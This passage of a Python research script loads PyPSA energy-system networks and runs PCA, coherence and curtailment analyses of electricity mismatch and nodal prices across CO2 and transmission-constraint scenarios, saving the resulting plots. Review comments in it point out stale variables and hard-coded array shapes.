titlePlotElec = "Nodal price for electricity only"
for i in np.arange(6):
    fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1),size="medium")#, titlePlotElec, titleFileName)
    title = (file[12:-3] + " - Map PC Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------------ FFT Plot (Elec + Heat) -----------------------#
# Path to save FFT plots
path = figurePath + "Nodal Price\\FFT\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
    fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = i+1, title=file_name)
    title = (file[12:-3] + " - FFT Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ----------------------- Seasonal Plot (Elec + Heat) ------------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Seasonal\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
# NOTE(review): timeIndex was last set inside the transmission loop above, not
# refreshed for this network — presumably all networks share the same hourly
# index, but confirm before relying on it.
for i in np.arange(6):
    fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6, title=file_name)
    title = (file[12:-3] + " - Seasonal Plot Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Timeseries\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
    fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
    title = (file[12:-3] + " - Timeseries Plot Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Nodal Price\\Combined Plot\\"
# --- Elec ---
# NOTE(review): lambdaCollectedConElec/lambdaCollectedResElec are stale leftovers
# from the last iteration of the transmission loop, and covMatrixElec is not
# defined anywhere in this section (only covMatrix is) — verify it is defined
# earlier in the file, otherwise this line raises NameError.
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withoutProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec NP (lambda 1 & 2)")
SavePlot(fig, path, title)
#%%
# ---------------------- Bar plot CO2 constraint --------------------------- #
# For each CO2 network: PCA of nodal prices, plus min/mean price statistics
# and their 5/25/75/95% quantiles across countries, for the evolution plot.
# Path to save bar plots
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store nodal price PC components for each network
barMatrixCO2Elec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
stdMeanPriceElec = []  # NOTE(review): appears unused below — candidate for removal
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_CO2:
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (two-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # --- Elec ---
    # Prices for electricity for each country, capped at 465 €/MWh by FilterPrice
    priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
    # PCA on nodal prices for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
    # Append value to matrix
    barMatrixCO2Elec.append(varianceExplainedElec)
    # ----------------------- NP Mean (Elec) --------------------#
    # --- Elec ---
    # Average (across countries) of each country's minimum and mean price
    minPrice = priceElec.min().mean()
    meanPrice = priceElec.mean().mean()
    # append min and mean to matrix
    meanPriceElec.append([minPrice, meanPrice])
    # ----------------------- NP Quantile (Elec) --------------------#
    # --- Elec ---
    # 5/25/75/95% quantiles across countries of min and mean price
    quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
    quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
    # append quantiles to matrix
    quantileMeanPriceElec.append(quantileMeanPrice)
    quantileMinPriceElec.append(quantileMinPrice)
# Bar chart: variance explained per PC across CO2 networks
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "" #"$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec NP")
SavePlot(fig, path, titleBarCO2Elec)
# ----------------------- Price evolution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3], fontsize=16)
title = (file[12:-14] + " - Elec NP CO2 Evolution")
SavePlot(fig, path, title)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Same nodal-price analysis as above, sweeping transmission-capacity scenarios.
# Path
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store nodal price PC components for each network
barMatrixTransmissionElec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_trans:
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (two-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # --- Elec ---
    # Prices for electricity for each country, capped at 465 €/MWh by FilterPrice
    priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
    # PCA on nodal prices for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
    # Append value to matrix
    barMatrixTransmissionElec.append(varianceExplainedElec)
    # ----------------------- NP Mean (Elec) --------------------#
    # --- Elec ---
    # Average (across countries) of each country's minimum and mean price
    minPrice = priceElec.min().mean()
    meanPrice = priceElec.mean().mean()
    # append min and mean to matrix
    meanPriceElec.append([minPrice, meanPrice])
    # ----------------------- NP Quantile (Elec) --------------------#
    # --- Elec ---
    # 5/25/75/95% quantiles across countries of min and mean price
    quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
    quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
    # append quantiles to matrix
    quantileMeanPriceElec.append(quantileMeanPrice)
    quantileMinPriceElec.append(quantileMinPrice)
# ----------------------- Bar plot (Elec) --------------------#
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "" #"Number of PC describing variance of network as a function of transmission constraint"
xlabel = "" #"Transmission constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec NP")
SavePlot(fig, path, titleBarTransmissionElec)
# ----------------------- Price evolution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3.2], fontsize=16)
title = (file[12:-14] + " - Elec NP Trans Evolution")
SavePlot(fig, path, title)
#%%
##############################################################################
##############################################################################
################################# Coherence ##################################
##############################################################################
##############################################################################
# Coherence between the electricity mismatch and nodal prices for the
# 95%-CO2-reduction, 2x-current-transmission network.
# -------------------- Coherence Plot (Elec + Heat) ---------------------#
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data (two-letter country codes)
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Path to save contribution plots
path = figurePath + "Coherence\\"
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation; rename "XX solar" -> "XX"
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation, summed per country
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# Prices for each country, capped at 465 €/MWh by FilterPrice
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# Coherence between prices and mismatch (three coherence measures)
c1Elec, c2Elec, c3Elec = Coherence(mismatchElec, priceElec)
# Plot properties
title1 = "" #"Coherence 1: Electricity mismatch and nodal price"
title2 = "" #"Coherence 2: Electricity mismatch and nodal price"
title3 = "" #"Coherence 3: Electricity mismatch and nodal price"
xlabel = "Electricity Mismatch"
ylabel="Electricity Prices"
noX = 6
noY = 6
# NOTE(review): the keyword "รผbertitle" looks like mojibake of "übertitle" —
# it must match the parameter name declared in functions_file; confirm encoding.
fig1 = CoherencePlot(dataMatrix=c1Elec.T, รผbertitle="", title=title1, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig2 = CoherencePlot(dataMatrix=c2Elec.T, รผbertitle="", title=title2, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig3 = CoherencePlot(dataMatrix=c3Elec.T, รผbertitle="", title=title3, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[-1,1])
SavePlot(fig1, path, title = (file[12:-3] + " - C1 elec mismatch and ENP"))
SavePlot(fig2, path, title = (file[12:-3] + " - C2 elec mismatch and ENP"))
SavePlot(fig3, path, title = (file[12:-3] + " - C3 elec mismatch and ENP"))
# Combined Plot of all three coherence measures
fig = CoherencePlotCombined(c1Elec.T, c2Elec.T, c3Elec.T, xlabel=xlabel, ylabel=ylabel)
SavePlot(fig, path, title = (file[12:-3] + " - C123 combined elec mismatch and ENP"))
# Finish timer and report total wall-clock runtime
t1 = time.time() # End timer
total_time = round(t1-t0)
total_time_min = math.floor(total_time/60)
total_time_sec = round(total_time-(total_time_min*60))
print("\n \nThe code is now done running. It took %s min and %s sec." %(total_time_min,total_time_sec))
# Import libraries
import os
import sys
import pypsa
import numpy as np
import pandas as pd
#from sympy import latex
import time
import math
# Timer
t0 = time.time() # Start a timer
# Import functions file
# The shared analysis/plotting helpers (PCA, SavePlot, MAP, BAR, ...) live in
# functions_file.py one directory up, so put that directory on the module path.
sys.path.append(os.path.split(os.getcwd())[0])
from functions_file import *
# Directory of file
# NOTE: paths are Windows-style ("\\") and resolved relative to the current
# working directory, so the script must be started from its own folder.
#directory = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Data\\elec_only\\"
directory = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Data\\elec_only\\"
# File name
# Naming convention: postnetwork-elec_only_<transmission factor>_<CO2 cap>.h5;
# for this default file, file[12:-3] is "elec_only_0.125_0.05" and
# file[12:-14] is "elec_only" (slices used throughout for figure titles).
file = "postnetwork-elec_only_0.125_0.05.h5"
# Generic file name
titleFileName = file
# Figure path
#figurePath = os.path.split(os.path.split(os.path.split(os.getcwd())[0])[0])[0] + "\\Figures\\elec_only\\"
figurePath = os.path.split(os.path.split(os.getcwd())[0])[0] + "\\Figures\\elec_only\\"
##############################################################################
##############################################################################
################################# Pre Analysis ###############################
##############################################################################
##############################################################################
# ------------------- Curtailment - CO2 constraints (Elec) ------------------#
# Curtailment across the CO2-cap scenarios; the last number of each file name
# is the remaining CO2 share (0.6 -> "40%" reduction, ..., 0.05 -> "95%").
# Path to save files
path = figurePath + "Pre Analysis\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints (axis labels, one per entry in filename_CO2)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_CO2, title=title, constraints=constraints, fontsize=14, ylim=[-1,20], figsize=[6, 4.5])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (CO2)"))
# --------------- Curtailment - Transmission constraints (Elec) --------------#
# Curtailment across the transmission-cap scenarios; the first number of each
# file name is the link cap factor (0 = no transmission).
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints (axis labels, one per entry in filename_trans)
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = ""#"Electricity Curtailment - " + file[12:-14]
fig = Curtailment(directory=directory, files=filename_trans, title=title, constraints=constraints, fontsize=14, rotation=-17.5, ylim=[-2,60], legendLoc="upper right", figsize=[6, 4.8])
SavePlot(fig, path, title=(file[12:-14] + " - Curtailment Elec (trans)"))
##############################################################################
##############################################################################
################################### MISMATCH #################################
##############################################################################
##############################################################################
# ------- Electricity produced by technology (Elec CO2 and Trans) -----------#
# Total electricity generation per technology for each CO2 scenario.
# Path to save files
path = figurePath + "Mismatch\\"
# List of file names
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# List of constraints (axis labels, one per entry in filename_CO2)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_CO2, constraints=constraints, fontsize=14, figsize=[6,6])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (CO2)"))
# Same overview for the transmission-constraint scenarios.
# List of file names
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# List of constraints (axis labels, one per entry in filename_trans)
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
fig = ElecProductionOvernight(directory=directory, filenames=filename_trans, constraints=constraints, rotation=-25, fontsize=14, figsize=[6,6.3])
SavePlot(fig, path, title=(file[12:-14] + " - total elec generation (trans)"))
# ------------------ Map Capacity Plots (Elec) ------------------#
# Maps of installed generator and storage capacities for the default scenario.
# Path to save files
path = figurePath + "Mismatch\\Map Capacity\\"
# --- Elec ---
# Import network
network = pypsa.Network(directory+file)
fig1, fig2, fig3 = MapCapacityOriginal(network, titleFileName, ncol=3)
SavePlot(fig1, path, title=(file[12:-3] + " - Map Capacity Elec Generator"))
SavePlot(fig2, path, title=(file[12:-3] + " - Map Capacity Elec Storage Energy"))
SavePlot(fig3, path, title=(file[12:-3] + " - Map Capacity Elec Storage Power"))
# -------------------- Map Energy Plot (Elec) -------------------#
# Path for saving file
path = figurePath + "Mismatch\\Map Energy Distribution\\"
# Import network
# NOTE(review): this reloads the same .h5 file that was just loaded above;
# the existing `network` object could simply be reused.
network = pypsa.Network(directory+file)
# --- Elec ---
figElec = MapCapacityElectricityEnergy(network, file)
SavePlot(figElec, path, title=(file[12:-3] + " - Elec Energy Production"))
# --------------------- Map PC Plot (Elec) ----------------------#
# Build the hourly electricity mismatch (generation minus load) per country
# and run a PCA on it; the resulting components are plotted in the sections
# below.
# Path to save plots
path = figurePath + "Mismatch\\Map PC\\"
# Import network
network = pypsa.Network(directory+file)
# Country codes: every bus name starts with a 2-letter country code
dataNames = network.buses.index.str.slice(0,2).unique()
# Hourly snapshots of the network
timeIndex = network.loads_t.p_set.index
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation, summed per country
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Offshore wind exists only for a subset of countries, so add it onto a
# zero-filled (snapshots x countries) frame to give every country a column,
# then replace the NaNs (countries without offshore wind) with zero.
# The frame shape is derived from the data instead of being hard-coded
# (was np.zeros([8760,30])), so this also works for networks with a
# different number of snapshots or countries.
generationOffwind = pd.DataFrame(0.0, index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.fillna(0)
# RoR generations (same treatment: only a subset of countries has run-of-river)
generationRoR = pd.DataFrame(0.0, index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.fillna(0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# ----------------------- Map Plot (Elec) -----------------------#
# Draw the first six mismatch principal components on the European map.
titlePlotElec = "Mismatch for electricity only"
for pcNo in range(1, 7):
    figMap = MAP(eigenVectorsElec, eigenValuesElec, dataNames, pcNo)#, titlePlotElec, titleFileName)
    SavePlot(figMap, path, (file[12:-3] + " - Map PC Elec Mismatch (lambda " + str(pcNo) + ")"))
# ----------------------- FFT Plot (Elec) -----------------------#
# Fourier spectrum of each PC time series.
path = figurePath + "Mismatch\\FFT\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for pcNo in range(1, 7):
    figFFT = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = pcNo)
    SavePlot(figFFT, path, (file[12:-3] + " - FFT Elec Mismatch (lambda " + str(pcNo) + ")"))
# -------------------- Seasonal Plot (Elec) ---------------------#
# Seasonal profile of each PC time series.
path = figurePath + "Mismatch\\Seasonal\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for pcNo in range(1, 7):
    figSeason = seasonPlot(TElec, timeIndex, PC_NO=pcNo, PC_amount=6, dpi=400)
    SavePlot(figSeason, path, (file[12:-3] + " - Seasonal Plot Elec Mismatch (lambda " + str(pcNo) + ")"))
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Combined frequency + seasonal view of each PC time series.
path = figurePath + "Mismatch\\Timeseries\\"
# --- Elec ---
file_name = "Electricity mismatch - " + file
for pcNo in range(1, 7):
    figTimeseries = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=pcNo, PC_amount=6, dpi=200)
    SavePlot(figTimeseries, path, (file[12:-3] + " - Timeseries Plot Elec Mismatch (lambda " + str(pcNo) + ")"))
# ----------------- Contribution plot (Elec) ------------------- #
# Technology terms from Contribution() projected onto the mismatch PCs.
# Path to save contribution plots
path = figurePath + "Mismatch\\Contribution\\"
# --- Elec ---
# Contribution
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
for i in range(6):
    fig = ConPlot(eigenValuesElec,lambdaCollectedConElec,i+1,10,suptitle=("Electricity Contribution - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Contribution Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- Response plot (Elec) -------------------- #
# Response terms from ElecResponse() projected onto the same PCs.
# Path to save contribution plots
path = figurePath + "Mismatch\\Response\\"
# --- Elec ---
# Response
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
for i in range(6):
    fig = ConPlot(eigenValuesElec,lambdaCollectedResElec,i+1,10,suptitle=("Electricity Response - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Response Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- Covariance plot (Elec) -------------------- #
# Covariance between mismatch and response terms, projected onto the PCs.
# Path to save contribution plots
path = figurePath + "Mismatch\\Covariance\\"
# --- Elec ---
# Covariance
covMatrixElec = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec).T
for i in range(6):
    fig = ConPlot(eigenValuesElec,covMatrixElec,i+1,10,suptitle=("Electricity Covariance - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Covariance Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- Combined Projection plot (Elec) -------------------- #
# Contribution, response and covariance for one PC in a single figure.
# Path to save contribution plots
path = figurePath + "Mismatch\\Projection\\"
# --- Elec ---
for i in range(6):
    fig = CombConPlot(eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec, i+1, depth = 6) #, suptitle=("Electricity Projection - " + file[12:-3]),dpi=200)
    title = (file[12:-3] + " - Projection Plot Elec (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Summary figure of the two leading PCs with their projections.
# Path to save contribution plots
path = figurePath + "Mismatch\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec (lambda 1 & 2)")
SavePlot(fig, path, title)
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Variance explained by the mismatch PCs for each CO2 scenario, collected
# into one grouped bar chart.
# Path to save bar plots
path = figurePath + "Mismatch\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store mismatch PC components for each network
barMatrixCO2Elec = []
# NOTE: the loop variable reuses the module-level name `file`; after the loop
# `file` holds the last scenario ("..._0.05.h5"), which later title slices rely on.
for file in filename_CO2:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (2-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    # NOTE(review): the 8760 x 30 shape is hard-coded; deriving it from
    # len(timeIndex) and len(dataNames) would be robust to other networks.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Append value to matrix
    barMatrixCO2Elec.append(varianceExplainedElec)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec Mismatch")
SavePlot(fig, path, titleBarCO2Elec)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
#path = "C:/Users/jense/OneDrive - Aarhus Universitet/Dokumenter/Århus Universitet/Kandidat - Civilingeniør/11. Semester/Master Thesis/Shared Documents/Figures/elec_only/Bar/"
path = figurePath + "Mismatch\\Bar\\"
# Variance explained by the mismatch PCs for each transmission scenario.
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store mismatch PC components for each network
barMatrixTransmissionElec = []
for file in filename_trans:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (2-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    # NOTE(review): the 8760 x 30 shape is hard-coded (see also the CO2 loop).
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Append value to matrix
